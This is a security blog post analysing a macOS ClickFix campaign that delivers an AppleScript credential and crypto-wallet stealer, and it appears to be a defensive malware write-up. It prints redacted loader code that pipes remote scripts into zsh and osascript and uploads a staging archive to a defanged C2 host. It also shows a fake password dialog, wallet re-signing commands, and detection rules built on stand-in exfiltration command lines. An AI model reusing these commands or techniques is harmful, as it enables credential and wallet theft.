{"id":104102,"date":"2026-02-12T02:22:54","date_gmt":"2026-02-12T10:22:54","guid":{"rendered":"https:\/\/www.intego.com\/mac-security-blog\/?p=104102"},"modified":"2026-03-03T04:56:11","modified_gmt":"2026-03-03T12:56:11","slug":"matryoshka-clickfix-macos-stealer","status":"publish","type":"post","link":"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/","title":{"rendered":"Unpacking the New \u201cMatryoshka\u201d ClickFix Variant: Typosquatting Campaign Delivers macOS Stealer"},"content":{"rendered":"<p><img loading=\"lazy\" class=\"alignnone wp-image-104101\" src=\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2026\/02\/matryoshka-clickfix-terminal-installation-screenshot-277x300.png\" alt=\"Screenshot of a fake \u201cDownload for macOS\u201d page showing a \u201cTerminal installation\u201d command with a Copy button and steps for opening Terminal.\" width=\"540\" height=\"585\" srcset=\"https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2026\/02\/matryoshka-clickfix-terminal-installation-screenshot-277x300.png 277w, https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2026\/02\/matryoshka-clickfix-terminal-installation-screenshot-139x150.png 139w, https:\/\/www.intego.com\/mac-security-blog\/wp-content\/uploads\/2026\/02\/matryoshka-clickfix-terminal-installation-screenshot.png 473w\" sizes=\"(max-width: 540px) 100vw, 540px\" \/><\/p>\n<h2 data-start=\"316\" data-end=\"412\"><\/h2>\n<h2 data-start=\"496\" data-end=\"516\">Executive Summary<\/h2>\n<p data-start=\"518\" data-end=\"802\">Intego Antivirus Labs is tracking an evolution of the \u201cClickFix\u201d social engineering campaign targeting macOS users. 
Dubbed <strong data-start=\"641\" data-end=\"655\">Matryoshka<\/strong> due to its nested obfuscation layers, this variant uses a fake installation\/fix flow to trick victims into executing a malicious Terminal command.<\/p>\n<p data-start=\"804\" data-end=\"1046\">While the ClickFix tactic is not new, this campaign introduces stronger evasion techniques \u2014 including an <strong data-start=\"910\" data-end=\"943\">in-memory, compressed wrapper<\/strong> and <strong data-start=\"948\" data-end=\"984\">API-gated network communications<\/strong> \u2014 designed to hinder static analysis and automated sandboxes.<\/p>\n<p data-start=\"1048\" data-end=\"1306\">At a high level, the attack relies on typosquatting and redirect infrastructure to deliver a \u201cpaste this fix\u201d prompt. Once executed, a loader retrieves an AppleScript payload that attempts to harvest browser credentials and target crypto wallet applications.<\/p>\n<div style=\"height: 8px; line-height: 8px;\"><\/div>\n<h2 data-start=\"1313\" data-end=\"1361\">Infection Vector: Typosquatting and Redirects<\/h2>\n<p data-start=\"1363\" data-end=\"1545\">The infection chain observed by our labs begins with a classic <a href=\"https:\/\/www.intego.com\/mac-security-blog\/type-a-url-wrong-and-you-might-end-up-with-malware-on-your-mac\/\"><strong data-start=\"1426\" data-end=\"1443\">typosquatting<\/strong><\/a> lure. 
Users attempting to visit legitimate software review sites are at risk if they mistype the URL.<\/p>\n<p data-start=\"1547\" data-end=\"1675\">We observed this specifically with <strong data-start=\"1582\" data-end=\"1604\">comparisions[.]org<\/strong> (note the extra \u201ci\u201d), a typosquatted domain targeting comparisons.org.<\/p>\n<h3 data-start=\"1677\" data-end=\"1696\">The attack flow<\/h3>\n<ul data-start=\"1698\" data-end=\"2025\">\n<li data-start=\"1698\" data-end=\"1790\">\n<p data-start=\"1700\" data-end=\"1790\"><strong data-start=\"1700\" data-end=\"1713\">The typo:<\/strong> The user accidentally visits the typosquatted domain (comparisions[.]org).<\/p>\n<\/li>\n<li data-start=\"1791\" data-end=\"1903\">\n<p data-start=\"1793\" data-end=\"1903\"><strong data-start=\"1793\" data-end=\"1810\">The redirect:<\/strong> The site immediately forwards the visitor through a <strong data-start=\"1863\" data-end=\"1900\">Traffic Distribution System (TDS)<\/strong>.<\/p>\n<\/li>\n<li data-start=\"1904\" data-end=\"2025\">\n<p data-start=\"1906\" data-end=\"2025\"><strong data-start=\"1906\" data-end=\"1919\">The trap:<\/strong> The user is presented with instructions to copy a \u201cfix\u201d command and paste it into the macOS <strong data-start=\"2012\" data-end=\"2024\">Terminal<\/strong>.<\/p>\n<\/li>\n<\/ul>\n<p data-start=\"2027\" data-end=\"2239\"><strong data-start=\"2027\" data-end=\"2046\">Why this works:<\/strong> This is a social engineering bypass. 
By pasting a command into Terminal, the user unknowingly authorizes execution, sidestepping the normal download-and-launch expectations many users rely on. It also sidesteps the platform controls tied to that flow: a script fetched with curl and piped straight into zsh is never saved with the quarantine attribute, so Gatekeeper and notarization checks never run.<\/p>\n<h2 data-start=\"2246\" data-end=\"2293\">Technical Analysis: The \u201cMatryoshka\u201d Wrapper<\/h2>\n<p data-start=\"2295\" data-end=\"2509\">Unlike earlier ClickFix variants that delivered relatively readable scripts, this campaign uses a \u201cMatryoshka\u201d (Russian doll) style wrapper to hide its inner logic from network scanners and quick static inspection.<\/p>\n<h3 data-start=\"2511\" data-end=\"2543\">Stage 0: Clipboard injection<\/h3>\n<p data-start=\"2545\" data-end=\"2711\">The pasted command does not directly download a standard macOS application. Instead, it retrieves a benign-looking shell script that contains a large encoded payload.<\/p>\n<p data-start=\"2713\" data-end=\"2812\">Below is a <strong data-start=\"2724\" data-end=\"2736\">redacted<\/strong> representation of the Stage 0 behavior (non-operational; domains defanged):<\/p>\n<div dir=\"ltr\"><pre><code># Observed logic pattern (redacted; non-operational)\necho \"Installing packages please wait...\"\ncurl -fsSL hxxp:\/\/barbermoo[.]xyz\/curl\/[TOKEN] | zsh\n<\/code><\/pre><\/div>\n<h3 data-start=\"2980\" data-end=\"3025\">Stage 1: In-memory decode + decompression<\/h3>\n<p data-start=\"3027\" data-end=\"3147\">The fetched script (commonly referenced as <code data-start=\"3070\" data-end=\"3080\"><span style=\"color: #a67c00;\">rogue.sh<\/span><\/code>) uses a heredoc to pass the payload through an in-memory pipeline:<\/p>\n<p data-start=\"3149\" data-end=\"3182\"><strong data-start=\"3149\" data-end=\"3182\">Base64 decode \u2192 gunzip \u2192 eval<\/strong><\/p>\n<p data-start=\"3184\" data-end=\"3367\">This is the core reason we refer to this variant as Matryoshka \u2014 the meaningful payload is nested inside an encoded\/compressed blob and only becomes readable when
expanded at runtime.<\/p>\n<h3 data-start=\"3369\" data-end=\"3411\">De-obfuscated wrapper logic (excerpt)<\/h3>\n<div>\n<div dir=\"ltr\"><pre><code>#!\/bin\/zsh\n# Simplified excerpt showing the decode\/decompress\/execute pipeline\npayload=$(base64 -D &lt;&lt;'PAYLOAD' | gunzip\n[...large base64+gzip content omitted...]\nPAYLOAD\n)\neval \"$payload\"\n<\/code><\/pre><\/div>\n<\/div>\n<p data-start=\"3614\" data-end=\"3856\"><strong data-start=\"3614\" data-end=\"3627\">Analysis:<\/strong> This wrapper hides the inner logic inside a base64-encoded, gzip-compressed blob that is \u201cexploded\u201d in memory and handed straight to <code>eval<\/code>; the inner script may never be written to disk as a clean file, reducing visibility for file-based scanning and complicating basic static triage. The wrapper that crosses the network is still plain text, however, so the heredoc-to-base64-to-gunzip-to-eval pattern, rather than the payload it carries, is what a static or network signature can key on.<\/p>\n<div style=\"height: 8px; line-height: 8px;\"><\/div>\n<h3 data-start=\"3863\" data-end=\"3913\">Stage 2: API-Gated Loader and Evasion Behaviors<\/h3>\n<p data-start=\"3915\" data-end=\"4075\">Once the wrapper expands, the inner loader executes. Our analysis revealed several evasion mechanisms that help the chain run quickly and complicate sandboxing.<\/p>\n<h2 data-start=\"4077\" data-end=\"4111\">Key evasion behaviors observed<\/h2>\n<h3 data-start=\"4113\" data-end=\"4142\">1) Background detachment<\/h3>\n<p data-start=\"4143\" data-end=\"4332\">The loader runs its main routine in the background and exits quickly. The user sees their Terminal prompt return almost immediately, which can lead them to believe the process has finished.<\/p>\n<h3 data-start=\"4334\" data-end=\"4360\">2) Output suppression<\/h3>\n<p data-start=\"4361\" data-end=\"4474\">The loader redirects stdin, stdout and stderr to \/dev\/null to suppress errors and reduce visible artifacts in the terminal session.<\/p>\n<h3 data-start=\"4476\" data-end=\"4507\">3) API-gated communication<\/h3>\n<p data-start=\"4508\" data-end=\"4690\">Requests require a specific custom header to receive meaningful responses from the server.
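<\/p>\n<p>The loader logic discussed in this section is only visible once the Stage 1 wrapper has been unpacked, and an analyst should do that without running it. The following is an added example for this post (it is not Intego\u2019s tooling and not code from the campaign): a Python unpacker that finds the heredoc fed to <code>base64<\/code>, decodes and gunzips it, and keeps peeling while the result is itself another wrapper. It builds its own constructed sample in the same shape as the <code>rogue.sh<\/code> excerpt; the heredoc tag, the 76-column wrapping and the inner script are assumptions, not the real sample.<\/p>

```python
"""Static unpacker for "base64 -> gunzip -> eval" shell wrappers.

Added example for analysts; it is neither Intego's tooling nor code from
the campaign. It recovers the inner script from a heredoc wrapper without
executing anything, and keeps peeling while the recovered text is itself
another wrapper layer. The sample wrapper below is constructed here.
"""
import base64
import gzip
import re
from typing import List, Optional

# A heredoc fed to a base64 decode:  base64 -D <<'TAG' ... \nTAG
# Quoted or bare tag, -D/-d/--decode, optional "| gunzip" on the same line.
HEREDOC_RE = re.compile(
    r"base64\s+(?:-D|-d|--decode)\s*<<-?\s*['\"]?(?P<tag>\w+)['\"]?[^\n]*\n"
    r"(?P<body>.*?)\n(?P=tag)[ \t]*$",
    re.DOTALL | re.MULTILINE,
)
GZIP_MAGIC = b"\x1f\x8b"


def unpack_layer(script: str) -> Optional[str]:
    """Return the script hidden in the first heredoc blob, or None if there is none."""
    m = HEREDOC_RE.search(script)
    if m is None:
        return None
    blob = base64.b64decode(re.sub(r"\s+", "", m.group("body")), validate=True)
    if blob.startswith(GZIP_MAGIC):  # only gunzip when the data really is gzip
        blob = gzip.decompress(blob)
    return blob.decode("utf-8", errors="replace")


def unpack_all(script: str, max_depth: int = 8) -> List[str]:
    """Peel nested wrappers; element 0 is the input, the last element is the innermost script."""
    layers = [script]
    while len(layers) <= max_depth:
        inner = unpack_layer(layers[-1])
        if inner is None:
            break
        layers.append(inner)
    return layers


def uses_eval(script: str) -> bool:
    """True if the script evals a variable, the hallmark of the Matryoshka wrapper."""
    return re.search(r"\beval\s+\"?\$", script) is not None


# --- constructed sample (assumed shape, not the real rogue.sh) --------------
INNER_SCRIPT = (
    "#!/bin/zsh\n"
    "# stand-in for the inner loader (constructed; it only prints a line)\n"
    "echo 'inner loader would run here'\n"
)


def build_wrapper(inner: str) -> str:
    """Build a wrapper in the shape of the page's rogue.sh excerpt (constructed)."""
    blob = base64.b64encode(gzip.compress(inner.encode("utf-8"))).decode("ascii")
    wrapped = "\n".join(blob[i:i + 76] for i in range(0, len(blob), 76))
    return (
        "#!/bin/zsh\n"
        "payload=$(base64 -D <<'PAYLOAD' | gunzip\n"
        f"{wrapped}\n"
        "PAYLOAD\n"
        ")\n"
        'eval "$payload"\n'
    )


# Two dolls deep: a wrapper whose payload is itself a wrapper.
SAMPLE_WRAPPER = build_wrapper(build_wrapper(INNER_SCRIPT))

if __name__ == "__main__":
    layers = unpack_all(SAMPLE_WRAPPER)
    print(f"{len(layers) - 1} wrapper layer(s); eval in outer: {uses_eval(layers[0])}")
    print(layers[-1])
```

<p>Running the file prints the number of layers and the innermost script. Because the recovered text is returned rather than passed to <code>eval<\/code>, the same routine can be pointed at a captured wrapper saved with <code>curl -o<\/code> instead of piped into zsh, and the gzip magic check means a wrapper that skips the compression step still unpacks.<\/p>\n<p>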
Without this header, the infrastructure may respond with generic errors or appear inactive, so a replayed URL without it tells an analyst nothing about whether the server is live.<\/p>\n<h3 data-start=\"4692\" data-end=\"4722\">4) Conditional forwarding<\/h3>\n<p data-start=\"4723\" data-end=\"4865\">The script checks for arguments and, if one is present, appends it to the payload request as a <code>pwd<\/code> parameter, consistent with harvested material (the captured password) being passed between stages.<\/p>\n<h3 data-start=\"4867\" data-end=\"4917\">De-obfuscated loader logic (redacted excerpt)<\/h3>\n<div>\n<div dir=\"ltr\"><pre><code>daemon_function() {\n  # Silence output\n  exec &lt;\/dev\/null &gt;\/dev\/null 2&gt;\/dev\/null\n  domain=\"barbermoo[.]xyz\"\n  api_key=\"5190ef17\u2026\"   # truncated\n  # $token: campaign token; its assignment is omitted from this excerpt\n  # Fetch AppleScript payload (API-gated)\n  # If an argument exists, it may be attached to the request\n  if [ $# -gt 0 ]; then\n    curl -s -H \"api-key: $api_key\" \"hxxp:\/\/$domain\/dynamic?txd=$token&amp;pwd=$1\" | osascript\n  else\n    curl -s -H \"api-key: $api_key\" \"hxxp:\/\/$domain\/dynamic?txd=$token\" | osascript\n  fi\n  # Exfiltration (staging archive)\n  curl -X POST \\\n    -H \"api-key: $api_key\" \\\n    -F \"file=@\/tmp\/osalogging.zip\" \\\n    -F \"buildtxd=$token\" \\\n    \"hxxp:\/\/$domain\/gate\"\n  rm -f \/tmp\/osalogging.zip\n}\n# Run in background to return control to user quickly\ndaemon_function \"$@\" &amp;\nexit 0\n<\/code><\/pre><\/div>\n<\/div>\n<p>Note that the response body is piped into <code>osascript<\/code> directly, so the AppleScript stage runs from stdin rather than from a saved script file, and the loader deletes the staging archive as soon as the upload returns.<\/p>\n<h2 data-start=\"5681\" data-end=\"5727\">Payload: Stealer Capabilities (AppleScript)<\/h2>\n<p data-start=\"5729\" data-end=\"5832\"><strong data-start=\"5729\" data-end=\"5750\">Payload filename:<\/strong> <code data-start=\"5751\" data-end=\"5775\"><span style=\"color: #a67c00;\">rogue_applescript.scpt<\/span><\/code><br data-start=\"5775\" data-end=\"5778\" \/><strong data-start=\"5778\" data-end=\"5799\">Intego detection:<\/strong> <code data-start=\"5800\" data-end=\"5832\"><span style=\"color: #a67c00;\">trojan:AppleScript\/Stealer.gen<\/span><\/code><\/p>\n<p data-start=\"5834\" data-end=\"5975\">If the handshake is successful, the
infrastructure delivers an <a href=\"https:\/\/www.intego.com\/mac-security-blog\/intego-malware-discovery-fake-arc-browser-with-unique-applescript-component\/\">AppleScript payload<\/a> designed to harvest credentials and target crypto wallets.<\/p>\n<h3 data-start=\"5977\" data-end=\"6020\">A) Password capture via a phishing loop<\/h3>\n<p data-start=\"6022\" data-end=\"6287\">The payload first attempts to retrieve sensitive material programmatically. If unsuccessful, it falls back to an interactive phishing loop that presents a macOS-style dialog branded as \u201cSystem Preferences,\u201d repeatedly prompting the user until they enter a password.<\/p>\n<h4 data-start=\"6289\" data-end=\"6324\"><strong>AppleScript excerpt (redacted)<\/strong><\/h4>\n<div>\n<div dir=\"ltr\"><pre><code>-- Redacted excerpt illustrating the fallback dialog loop concept\nset result to display dialog \"Required Application Helper. Please enter password to continue.\" default answer \"\" with title \"System Preferences\" with hidden answer\n<\/code><\/pre><\/div>\n<\/div>\n<p>Two details give this prompt away. System Preferences was renamed System Settings in macOS 13, so the title is stale on any current system, and genuine credential prompts are drawn by the system\u2019s SecurityAgent, not by an AppleScript <code>display dialog \u2026 with hidden answer<\/code> run through <code>osascript<\/code>. That osascript dialog pattern is also a useful detection hook in its own right.<\/p>\n<h3 data-start=\"6583\" data-end=\"6636\">B) Wallet targeting: Ledger Live and Trezor Suite<\/h3>\n<p data-start=\"6638\" data-end=\"6730\">The malware aggressively targets hardware wallet applications using two distinct approaches.<\/p>\n<h4 data-start=\"6732\" data-end=\"6773\"><strong>1) Trezor Suite (delete and replace)<\/strong><\/h4>\n<p data-start=\"6774\" data-end=\"6907\">If Trezor Suite is found, the script attempts to terminate the process, remove the application, and download a malicious replacement.<\/p>\n<h4 data-start=\"6909\" data-end=\"6948\"><strong>2) Ledger Live (surgical patching)<\/strong><\/h4>\n<p data-start=\"6949\" data-end=\"7181\">Ledger Live is handled more subtly.
The payload attempts to replace an Electron archive (<strong data-start=\"7038\" data-end=\"7052\"><code data-start=\"7040\" data-end=\"7050\"><span style=\"color: #a67c00;\">app.asar<\/span><\/code><\/strong>) and related metadata within the legitimate application bundle, then performs <strong data-start=\"7131\" data-end=\"7151\">local re-signing<\/strong> to reduce integrity warnings.<\/p>\n<h4 data-start=\"7183\" data-end=\"7235\"><strong>AppleScript excerpt (redacted; non-operational)<\/strong><\/h4>\n<div>\n<div dir=\"ltr\"><pre><code>-- Redacted example showing the concept (URLs and key truncated)\n-- Downloads replacement components, swaps them into the bundle, then ad-hoc signs\ndo shell script \"curl -L -H 'api-key: 5190ef17\u2026' hxxps:\/\/barbermoo[.]xyz\/ledger\/... -o \/tmp\/ledger.dmg\"\ndo shell script \"codesign -f -s - \/Applications\/Ledger\\\\ Live.app\"\n<\/code><\/pre><\/div>\n<\/div>\n<p>The re-signing uses the ad-hoc identity (<code>codesign -s -<\/code>). That keeps the bundle internally consistent, so the patched app keeps launching, but it discards the vendor\u2019s Developer ID signature. On a tampered copy, <code>codesign -dv --verbose=4 \/Applications\/Ledger\\ Live.app<\/code> reports <code>Signature=adhoc<\/code> with no Developer ID authority chain, and <code>spctl --assess --type execute<\/code> rejects the bundle; either is a quick integrity check for responders and wallet users.<\/p>\n<h3 data-start=\"7581\" data-end=\"7603\">C) Final deception<\/h3>\n<p data-start=\"7605\" data-end=\"7841\">After collecting data (including browser material and wallet-related artifacts), the script stages it into <code data-start=\"7712\" data-end=\"7733\"><span style=\"color: #a67c00;\">\/tmp\/osalogging.zip<\/span><\/code> for the loader to upload. It then displays a final error message intended to misdirect the victim, such as:<\/p>\n<blockquote data-start=\"7843\" data-end=\"7951\">\n<p data-start=\"7845\" data-end=\"7951\">\u201cYour Mac does not support this application.
Try reinstalling or downloading the version for your system.\u201d<\/p>\n<\/blockquote>\n<p data-start=\"7953\" data-end=\"8009\">This helps reduce suspicion and can delay investigation.<\/p>\n<p>&nbsp;<\/p>\n<h2 data-start=\"8016\" data-end=\"8043\">Detection and Protection<\/h2>\n<p data-start=\"8045\" data-end=\"8208\">This campaign highlights the risks of \u201cfileless-style\u201d execution, where a user is tricked into running a command that executes remote content from a shell session.<\/p>\n<p data-start=\"8210\" data-end=\"8516\">However, the chain still creates defensive opportunities \u2014 including network activity, AppleScript execution, temporary staging archives, and wallet application tampering attempts. Intego VirusBarrier detects components of this attack when they touch the filesystem or when payload behaviors are triggered.<\/p>\n<p data-start=\"8518\" data-end=\"8540\"><strong data-start=\"8518\" data-end=\"8540\">Intego detections:<\/strong><\/p>\n<ul data-start=\"8541\" data-end=\"8645\">\n<li data-start=\"8541\" data-end=\"8586\">\n<p data-start=\"8543\" data-end=\"8586\"><code data-start=\"8543\" data-end=\"8566\"><span style=\"color: #a67c00;\">trojan:OSX\/Stealer.sh<\/span><\/code> (Bash\/Zsh loader)<\/p>\n<\/li>\n<li data-start=\"8587\" data-end=\"8645\">\n<p data-start=\"8589\" data-end=\"8645\"><code data-start=\"8589\" data-end=\"8621\"><span style=\"color: #a67c00;\">trojan:AppleScript\/Stealer.gen<\/span><\/code> (AppleScript payload)<\/p>\n<\/li>\n<\/ul>\n<p data-start=\"8647\" data-end=\"8720\"><strong data-start=\"8647\" data-end=\"8658\">Status:<\/strong> Active signatures for observed stages of the infection chain.<\/p>\n<h3 data-start=\"8722\" data-end=\"8740\">Recommendation<\/h3>\n<p data-start=\"8742\" data-end=\"8977\">Users should be trained that legitimate software updates, drivers, and \u201cfixes\u201d will never require pasting code into Terminal. 
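<\/p>\n<p>The defensive opportunities listed above (network activity, AppleScript execution, staging archives, wallet tampering) translate into a handful of process-level rules. The following is an added example, not Intego\u2019s detection logic or VirusBarrier signatures: Python rules evaluated over constructed process-execution events in an assumed <code>pid\/ppid\/exe\/cmdline<\/code> schema. The rule IDs, the event fields and the <code>c2.example<\/code> domain are assumptions; the events mirror the chain in this post alongside benign look-alikes that must not fire.<\/p>

```python
"""Detection rules for the ClickFix execution chain, run over process-execution
events of the kind an EDR or Endpoint Security client records on macOS.

Added example; it is not Intego's detection logic or VirusBarrier signatures.
The event schema (pid, ppid, exe, cmdline), the rule IDs and the c2.example
domain are assumptions; the events below are constructed to mirror the chain
described in this post plus a few benign look-alikes.
"""
import re
from collections import defaultdict
from typing import Dict, List

# R1: remote content piped straight into an interpreter from one command line
PIPE_TO_INTERPRETER = re.compile(
    r"\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:zsh|bash|sh|osascript)\b")
# R2: base64 decode and gunzip spawned by the same parent (in-memory unpacking)
B64_DECODE = re.compile(r"\bbase64\b.*\s(?:-D|-d|--decode)\b")
GUNZIP = re.compile(r"\b(?:gunzip|zcat)\b|\bgzip\b.*\s-d\b")
# R3: osascript with no script argument, i.e. fed on stdin, next to a curl sibling
OSASCRIPT_STDIN = re.compile(r"^(?:/usr/bin/)?osascript\s*$")
CURL = re.compile(r"\bcurl\b")
# R4: multipart upload of a zip staged under /tmp
TMP_ZIP_UPLOAD = re.compile(r"\bcurl\b.*-F\s*['\"]?\w+=@/tmp/[^\s'\"]+\.zip")
# R5: ad-hoc re-signing (-s -) of an installed application bundle
ADHOC_SIGN = re.compile(r"\bcodesign\b.*\s(?:-s|--sign)\s+-(?:\s|$)")

Event = Dict[str, object]


def detect(events: List[Event]) -> List[Dict[str, object]]:
    """Return one hit per (rule, pid); correlation rules look at siblings via ppid."""
    hits: List[Dict[str, object]] = []
    by_parent: Dict[int, List[Event]] = defaultdict(list)
    for ev in events:
        by_parent[int(ev["ppid"])].append(ev)

    def hit(rule: str, ev: Event, why: str) -> None:
        hits.append({"rule": rule, "pid": ev["pid"], "why": why})

    for ev in events:
        cmd = str(ev["cmdline"])
        siblings = by_parent[int(ev["ppid"])]
        if PIPE_TO_INTERPRETER.search(cmd):
            hit("R1", ev, "download piped into an interpreter")
        if B64_DECODE.search(cmd) and any(GUNZIP.search(str(s["cmdline"])) for s in siblings):
            hit("R2", ev, "base64 decode with a gunzip sibling (in-memory unpack)")
        if OSASCRIPT_STDIN.match(cmd) and any(CURL.search(str(s["cmdline"])) for s in siblings):
            hit("R3", ev, "osascript reading stdin next to a curl sibling")
        if TMP_ZIP_UPLOAD.search(cmd):
            hit("R4", ev, "upload of a staging archive from /tmp")
        if ADHOC_SIGN.search(cmd) and "/Applications/" in cmd:
            hit("R5", ev, "ad-hoc re-signing of an installed app")
    return hits


# --- constructed events (not real telemetry) --------------------------------
SAMPLE_EVENTS: List[Event] = [
    {"pid": 501, "ppid": 400, "exe": "/bin/zsh",
     "cmdline": "zsh -c 'echo \"Installing packages please wait...\"; "
                "curl -fsSL http://c2.example/curl/TOKEN | zsh'"},
    {"pid": 503, "ppid": 502, "exe": "/usr/bin/base64", "cmdline": "base64 -D"},
    {"pid": 504, "ppid": 502, "exe": "/usr/bin/gunzip", "cmdline": "gunzip"},
    {"pid": 505, "ppid": 500, "exe": "/usr/bin/curl",
     "cmdline": "curl -s -H api-key:5190ef17 http://c2.example/dynamic?txd=TOKEN"},
    {"pid": 506, "ppid": 500, "exe": "/usr/bin/osascript", "cmdline": "osascript"},
    {"pid": 511, "ppid": 500, "exe": "/bin/sh",
     "cmdline": "sh -c codesign -f -s - /Applications/Ledger\\ Live.app"},
    {"pid": 515, "ppid": 500, "exe": "/usr/bin/curl",
     "cmdline": "curl -X POST -H api-key:5190ef17 -F file=@/tmp/osalogging.zip "
                "-F buildtxd=TOKEN http://c2.example/gate"},
    # benign look-alikes that must stay quiet
    {"pid": 600, "ppid": 400, "exe": "/usr/bin/curl",
     "cmdline": "curl -fsSL https://example.com/tool.tgz -o tool.tgz"},
    {"pid": 601, "ppid": 400, "exe": "/usr/bin/codesign",
     "cmdline": "codesign -f -s \"Developer ID Application: Example (ABCDE12345)\" build/MyApp.app"},
    {"pid": 602, "ppid": 400, "exe": "/usr/bin/osascript",
     "cmdline": "osascript -e 'display notification \"build finished\"'"},
    {"pid": 603, "ppid": 700, "exe": "/usr/bin/base64", "cmdline": "base64 -D"},
]

if __name__ == "__main__":
    for h in detect(SAMPLE_EVENTS):
        print(f"{h['rule']} pid={h['pid']}: {h['why']}")
```

<p>R2 and R3 are correlation rules: a lone <code>base64 -D<\/code> or an <code>osascript -e<\/code> notification is normal on a developer\u2019s Mac, so each fires only when the telltale sibling process exists under the same parent. The benign events in the sample exercise exactly those boundaries, and R5 deliberately ignores a Developer ID signing of a build directory while catching the ad-hoc re-sign of an installed wallet app.<\/p>\n<p>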
If a website instructs you to \u201cpaste this command to fix an error,\u201d treat it as malicious and close the page.<\/p>\n<h2 data-start=\"8984\" data-end=\"9018\">Indicators of Compromise (IOCs)<\/h2>\n<div>\n<div tabindex=\"-1\">\n<table>\n<thead>\n<tr>\n<th>Type<\/th>\n<th>Indicator<\/th>\n<th>Context<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td>C2 domain<\/td>\n<td>barbermoo[.]xyz<\/td>\n<td>Primary command-and-control infrastructure<\/td>\n<\/tr>\n<tr>\n<td>Typosquatting domain<\/td>\n<td>comparisions[.]org<\/td>\n<td>Initial redirect (typosquat of comparisons.org)<\/td>\n<\/tr>\n<tr>\n<td>Gateway URL<\/td>\n<td>macfilesendstream[.]com\/r2\/<\/td>\n<td>Traffic distribution \/ routing hop<\/td>\n<\/tr>\n<tr>\n<td>Header<\/td>\n<td>api-key: 5190ef17\u2026<\/td>\n<td>Required for C2 communication (value truncated)<\/td>\n<\/tr>\n<tr>\n<td>File path<\/td>\n<td>\/tmp\/osalogging.zip<\/td>\n<td>Staging file for stolen data<\/td>\n<\/tr>\n<tr>\n<td>SHA-256<\/td>\n<td>62ca9538889b767b1c3b93e76a32fb4469a2486cb3ccb5fb5fa8beb2dd0c2b90<\/td>\n<td>Observed sample<\/td>\n<\/tr>\n<tr>\n<td>SHA-256<\/td>\n<td>d675bff1b895b1a231c86ace9d7a39d5704e84c4bc015525b2a9c80c39158338<\/td>\n<td>Wrapper script (rogue.sh)<\/td>\n<\/tr>\n<tr>\n<td>SHA-256<\/td>\n<td>48770b6493f2b9b9e1d9bdbf482ed981e709bd03e53885ff992121af16f76a09<\/td>\n<td>Inner loader script<\/td>\n<\/tr>\n<tr>\n<td>SHA-256<\/td>\n<td>Not available at time of publication<\/td>\n<td>AppleScript payload (rogue_applescript.scpt)<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<div style=\"height: 8px; line-height: 8px;\"><\/div>\n<h2>What to Know and What to Do<\/h2>\n<p>Matryoshka is a good example of why ClickFix-style campaigns keep working on macOS: the attacker doesn\u2019t need an exploit if they can convince the user to run the first command.
From there, layered in-memory unpacking and API-gated delivery make the chain harder to inspect quickly, while the AppleScript payload focuses on high-value targets like browser credentials and crypto wallets.<\/p>\n<p>The most important defense is behavioral: treat any website that asks you to paste a \u201cfix\u201d command into Terminal as malicious. For teams, focus detections on the execution chain and the artifacts it still leaves behind.<\/p>\n<ul>\n<li>Block and monitor typosquatting domains and TDS-style redirect infrastructure.<\/li>\n<li>Alert on Terminal-initiated fetch-and-execute patterns and unexpected <strong>osascript<\/strong> execution.<\/li>\n<li>Watch for suspicious staging archives under <strong>\/tmp\/<\/strong> and tampering or re-signing of wallet applications.<\/li>\n<\/ul>\n<div style=\"border-left: 4px solid #3B5B8A; background: #f7f7f7; padding: 12px 14px; margin: 14px 0;\"><strong>Researcher note:<\/strong> The infrastructure may require a custom header value to return meaningful responses. Without it, the server can appear inactive or return generic errors \u2014 a tactic used to frustrate automated analysis.<\/div>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Executive Summary Intego Antivirus Labs is tracking an evolution of the \u201cClickFix\u201d social engineering campaign targeting macOS users. Dubbed Matryoshka due to its nested obfuscation layers, this variant uses a fake installation\/fix flow to trick victims into executing a malicious Terminal command. 
While the ClickFix tactic is not new, this campaign introduces stronger evasion techniques [&hellip;]<\/p>\n","protected":false},"author":115,"featured_media":104101,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"spay_email":"","jetpack_publicize_message":"","jetpack_is_tweetstorm":false},"categories":[190,13,5],"tags":[4809,4810],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v17.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<meta name=\"description\" content=\"Executive Summary Intego Antivirus Labs is tracking an evolution of the \u201cClickFix\u201d social engineering campaign targeting macOS users. Dubbed Matryoshka Intego analyzed the Matryoshka ClickFix variant using typosquatting and a Terminal paste lure to deliver an AppleScript stealer and target crypto wallets.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.intego.com\/mac-security-blog\/matryoshka-clickfix-macos-stealer\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Unpacking the New \u201cMatryoshka\u201d ClickFix Variant: Typosquatting Campaign Delivers macOS Stealer - The Mac Security Blog Matryoshka ClickFix Variant Delivers macOS Stealer via Typosquatting\" \/>\n<meta property=\"og:description\" content=\"Executive Summary Intego Antivirus Labs is tracking an evolution of the \u201cClickFix\u201d social engineering campaign targeting macOS users. 
